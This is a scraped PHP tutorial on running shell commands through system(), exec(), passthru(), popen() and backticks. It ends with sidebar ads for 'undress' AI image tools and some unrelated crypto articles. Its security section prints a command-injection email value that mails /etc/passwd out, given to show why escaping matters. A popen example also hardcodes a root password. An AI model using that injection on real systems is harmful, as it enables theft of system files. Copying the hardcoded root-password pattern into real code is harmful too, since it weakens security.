Backend Development
PHP Tutorial
PHP executes system external commands system() exec() passthru()_PHP tutorial
PHP executes system external commands system() exec() passthru()_PHP tutorial
Difference:
system() outputs and returns the last line of shell results.
exec() does not output results and returns the last line of shell results. All results can be saved in a returned array.
passthru() only calls the command and outputs the result of the command directly to the standard output device as is.
Same point: you can get the status code of command execution
demo:
//system('dir');
// exec ('dir');
// passthru ('dir');
// echo `dir`;
As a server-side scripting language, PHP is fully capable of tasks such as writing simple or complex dynamic web pages. But this is not always the case. Sometimes in order to implement a certain function, you must resort to external programs (or commands) of the operating system, so that you can get twice the result with half the effort.
So, is it possible to call external commands in PHP scripts? If so, how to do it? What are your concerns? I believe that after reading this article, you will definitely be able to answer these questions.
Is it possible?
The answer is yes. PHP, like other programming languages, can call external commands within the program, and it is very simple: just use one or a few functions.
Prerequisites
Since PHP is basically used for WEB program development, security has become an important aspect that people consider. So PHP designers added a door to PHP: safe mode. If running in safe mode, the PHP script will be subject to the following four restrictions:
Execute external commands
There are some restrictions when opening files
Connect to MySQL database
HTTP-based authentication
In safe mode, only external programs in specific directories can be executed, and calls to other programs will be denied. This directory can be specified using the safe_mode_exec_dir directive in the php.ini file, or by adding the --with-exec-dir option when compiling PHP. The default is /usr/local/php/bin.
If you call an external command that should be able to output results (meaning that the PHP script has no errors), but get a blank, then it is likely that your network administrator has run PHP in safe mode.
How to do it?
To call external commands in PHP, you can use the following three methods:
1) Use the special functions provided by PHP
PHP provides a total of 3 special functions for executing external commands: system() , exec(), passthru().
system()
Prototype: string system (string command [, int return_var])
The system() function is similar to that in other languages. It executes the given command, outputs and returns the result. The second parameter is optional and is used to get the status code after the command is executed.
Example:
system("/usr/ local/bin/webalizer/webalizer");
?>
exec()
Prototype: string exec (string command [, string array [, int return_var]])
The exec () function is similar to system (). It also executes the given command, but does not output the result, but returns the last line of the result. Although it only returns the last line of the command result, using the second parameter array can get the complete result by appending the results line by line to the end of the array. So if the array is not empty, it is best to use unset() to clear it before calling it. Only when the second parameter is specified, the third parameter can be used to obtain the status code of command execution.
Example:
exec("/bin/ ls -l");
exec("/bin/ls -l", $res);
exec("/bin/ls -l", $res, $rc);
?> ;
passthru()
Prototype: void passthru (string command [, int return_var])
passthru () only calls the command and does not return any results, but saves the running results of the command Output directly to the standard output device as is. Therefore, the passthru() function is often used to call programs like pbmplus (a tool for processing images under Unix that outputs a binary stream of original images). It can also get the status code of command execution.
Example:
header("Content-type : image/gif");
passthru("./ppmtogif hunte.ppm");
?>
2) Use the popen() function to open the process
The above method can only simply execute the command, but cannot interact with the command. But sometimes you must enter something into the command. For example, when adding a Linux system user, you need to call su to change the current user to root, and the su command must enter the root password on the command line. In this case, it is obviously not possible to use the method mentioned above.
The popen () function opens a process pipe to execute the given command and returns a file handle. Since a file handle is returned, you can read and write to it. In PHP3, this kind of handle can only be used in a single operation mode, either writing or reading; starting from PHP4, it is possible to read and write at the same time. Unless the handle is opened in one mode (read or write), the pclose() function must be called to close it.
Example 1:
$fp=popen( "/bin/ls -l", "r");
?>
Example 2:
/* How to add a system user in PHP
The following is a routine to add a user named james,
The root password is very good. For reference only
*/
$sucommand = "su --login root --command";
$useradd = "useradd ";
$rootpasswd = "verygood";
$user = "james";
$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w") ;
@fputs($fp,$rootpasswd);
@pclose($fp);
?>
3) Use a backtick (`, that is The one under the ESC key on the keyboard is the same as ~)
This method was not included in the PHP documentation before and existed as a secret technique. The method is very simple. Use two backticks to enclose the command to be executed as an expression. The value of this expression is the result of the command execution. For example:
$res='/bin/ls - l';
echo '
'.$res.'
';
?>
The output of this script is like:
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
What to consider?
Two issues to consider: security and timeouts.
Look at safety first. For example, you have a small online store, so the list of products available for sale is placed in a file. You write an HTML file with a form that lets your users enter their email address and then sends them a list of products. Assuming that you have not used PHP's mail() function (or have never heard of it), you call the mail program of the Linux/Unix system to send this file. The program is like this:
system("mail $to < products.txt");
echo "Our product catalog has been sent to your mailbox: $to";
?>
Use this code, generally There is no danger to users, but there are actually very large security holes. If a malicious user enters an EMAIL address like this:
'--bla ; mail someone@domain.com < /etc/passwd ;'
then this command eventually becomes:
' mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
I believe that any network administrator will break out in a cold sweat when seeing such a command.
Fortunately, PHP provides us with two functions: EscapeShellCmd() and EscapeShellArg(). The function EscapeShellCmd escapes all characters in a string that may be used to execute another command without the Shell. These characters have special meanings in the Shell, such as semicolon (), redirection (>), and reading from a file (<). The function EscapeShellArg is used to process command parameters. It adds single quotes around the given string and escapes the single quotes in the string so that the string can be safely used as a command argument.
Let’s look at the timeout issue again. If the command to be executed takes a long time, the command should be run in the background of the system. But by default, functions such as system() wait until the command is finished running before returning (actually, they have to wait for the output of the command), which will definitely cause the PHP script to time out. The solution is to redirect the output of the command to another file or stream, such as:
system("/usr/local/bin/order_proc > /tmp/null &");
?>
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
What is the difference between pre-market and after-market trading? Detailed explanation of the differences between pre-market and after-market trading
Mar 03, 2025 pm 11:54 PM
In traditional financial markets, pre-market and after-market trading refers to trading activities outside the regular trading period. Although the cryptocurrency market is trading around the clock, trading platforms like Bitget also offer similar features, especially some comprehensive platforms that trade stocks and cryptocurrencies at the same time. This article will clarify the differences in pre-market and after-market trading and explore its impact on currency price. Four major differences between pre-market and after-market trading: The main differences between pre-market and after-market trading and regular trading periods are in four aspects: trading time, liquidity, price fluctuations and trading volume: Trading time: Pre-market trading occurs before the official trading starts, and after-market trading is carried out after the regular trading ends. Liquidity: The liquidity of pre- and after-hours trading is low, there are few traders, and the bid and offer price difference is large; while the liquidity is high during the regular trading period, the price is
Why is Bittensor said to be the 'bitcoin' in the AI track?
Mar 04, 2025 pm 04:06 PM
Original title: Bittensor=AIBitcoin? Original author: S4mmyEth, Decentralized AI Research Original translation: zhouzhou, BlockBeats Editor's note: This article discusses Bittensor, a decentralized AI platform, hoping to break the monopoly of centralized AI companies through blockchain technology and promote an open and collaborative AI ecosystem. Bittensor adopts a subnet model that allows the emergence of different AI solutions and inspires innovation through TAO tokens. Although the AI market is mature, Bittensor faces competitive risks and may be subject to other open source
Is there any difference between South Korean Bitcoin and domestic Bitcoin?
Mar 05, 2025 pm 06:51 PM
The Bitcoin investment boom continues to heat up. As the world's first decentralized digital asset, Bitcoin has attracted much attention on its decentralization and global liquidity. Although China was once the largest market for Bitcoin, policy impacts have led to transaction restrictions. Today, South Korea has become one of the major Bitcoin markets in the world, causing investors to question the differences between it and its domestic Bitcoin. This article will conduct in-depth analysis of the differences between the Bitcoin markets of the two countries. Analysis of the differences between South Korea and China Bitcoin markets. The main differences between South Korea and China’s Bitcoin markets are reflected in prices, market supply and demand, exchange rates, regulatory supervision, market liquidity and trading platforms. Price difference: South Korea’s Bitcoin price is usually higher than China, and this phenomenon is called “Kimchi Premium.” For example, in late October 2024, the price of Bitcoin in South Korea was once
Vertical proxy: Application scenarios and interpretation of disruptive potential of encryption native proxy
Mar 04, 2025 am 10:21 AM
Artificial intelligence agents (AIAgents) are rapidly integrating into daily operations of enterprises, from large companies to small businesses, almost all areas have begun to be used, including sales, marketing, finance, law, IT, project management, logistics, customer service and workflow automation. We are moving from an era of manual processing of data, performing repetitive tasks, and using Excel tables to an era of autonomous operation by AI agents around the clock, which not only improves efficiency but also significantly reduces costs. Application case of AI agents in Web2: YCombinator's Perspective Apten: A sales and marketing optimization tool combining AI and SMS technology. BildAI: A model that can read architectural blueprints,
What exchange is Nexo? Is Nexo exchange safe?
Mar 05, 2025 pm 07:39 PM
Nexo: Not only is it a cryptocurrency exchange, but also your digital financial manager. Nexo is not a traditional cryptocurrency exchange, but a financial platform that focuses more on cryptocurrency lending. It allows users to obtain loans in cryptocurrency as collateral and provides services to earn interest. While Nexo also offers cryptocurrency buying, selling and redemption capabilities, its core business is crypto lending. This article will explore the operating model and security of Nexo in depth to provide investors with a more comprehensive understanding. Nexo's operating model was founded in 2018 and is headquartered in Zug, Switzerland, and is a pioneer in the field of digital finance. It is different from other centralized exchanges and focuses more on providing comprehensive financial services. Users can buy, sell, trade cryptocurrencies without selling assets and
The difference between Ether and Bitcoin What is the difference between Ether and Bitcoin
Mar 19, 2025 pm 04:54 PM
The difference between Ethereum and Bitcoin is significant. Technically, Bitcoin uses PoW, and Ether has shifted from PoW to PoS. Trading speed is slow for Bitcoin and Ethereum is fast. In application scenarios, Bitcoin focuses on payment storage, while Ether supports smart contracts and DApps. In terms of issuance, the total amount of Bitcoin is 21 million, and there is no fixed total amount of Ether coins. Each security challenge is available. In terms of market value, Bitcoin ranks first, and the price fluctuations of both are large, but due to different characteristics, the price trend of Ethereum is unique.
What does closing a virtual currency position mean? Same as selling? How to avoid forced closing of positions?
Mar 04, 2025 am 06:51 AM
Detailed explanation of closing positions in virtual currency trading: Strategies to avoid the risk of liquidation. This article will deeply explore the concept of "closing positions" in the virtual currency market, and clarify the difference between it and "sell", and how to effectively avoid the risk of forced liquidation (filtering positions). What is virtual currency closing? Close positions refers to investors ending existing positions through reverse trading, thereby locking in profits and losses. For example, investors holding long positions (buy) can close their positions by selling equal amounts of virtual currency; investors holding short positions (sell) need to buy equal amounts of virtual currency to close their positions. A closing operation is essentially closing or releasing an established investment position. Is closing a position equal to selling? Although long closing does involve selling operations, closing and selling are not exactly the same. Close position definition: End opened
How many times is the U standard 2 times equivalent to the U standard? What is the difference between U standard and currency standard?
Mar 04, 2025 am 07:48 AM
Coin Standard and U-Material Perpetual Contract: Conversion and risk analysis of leverage multiples. The pricing methods of perpetual contracts are mainly divided into two types: coin Standard and U-Material. The currency standard contract is settled in the transaction cryptocurrency (such as BTC, ETH), with the goal of obtaining more of the cryptocurrency; the U standard contract is settled in the stablecoin (such as USDT), with the goal of earning more stablecoins, similar to the traditional gold standard system. Many investors are curious: How many times the leverage at the currency standard is equivalent to the U standard? To put it simply, the conversion between the 2x leverage of the currency standard and the leverage of the U standard is roughly equivalent to the 2x leverage of the U standard. However, this equivalence relationship is not absolute, as currency price fluctuations significantly affect the actual leverage effect. The risk of currency standard leverage will fluctuate with the currency price
